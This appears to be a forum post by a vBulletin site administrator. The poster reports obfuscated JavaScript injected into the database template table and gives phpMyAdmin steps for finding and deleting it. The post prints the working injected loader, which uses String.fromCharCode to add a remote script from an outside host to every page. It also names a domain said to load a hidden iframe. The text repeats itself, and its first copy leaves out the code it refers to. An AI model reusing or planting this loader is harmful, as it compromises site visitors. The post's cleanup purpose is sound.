Hey guys,
I've seen this more then a few times and it's all the same problem. Some code gets injected into the database on the template table. Here is the code:
If you decode the numbers from the second fromCharCode() you get the following URL:
This URL loads http://directmarketingmanage.in/in.cgi?walter into a secret iframe, which some antivirus softwares like Avast complain about. To fix the problem go in phpMyAdmin, go to your database then hit search. Look for 'vBulletin_init' without the quotes in only the template table. On this page just right click edit on every one it found and open in a new tab. Now just search on the page for vBulletin_init til you find it in the table and remove the code listed above. How this got injected into my database I have no idea.. can has patch?
I've seen this more then a few times and it's all the same problem. Some code gets injected into the database on the template table. Here is the code:
Code:
var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,105,109,97,103,101,50,121,111,117,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);
This URL loads http://directmarketingmanage.in/in.cgi?walter into a secret iframe, which some antivirus softwares like Avast complain about. To fix the problem go in phpMyAdmin, go to your database then hit search. Look for 'vBulletin_init' without the quotes in only the template table. On this page just right click edit on every one it found and open in a new tab. Now just search on the page for vBulletin_init til you find it in the table and remove the code listed above. How this got injected into my database I have no idea.. can has patch?
Comment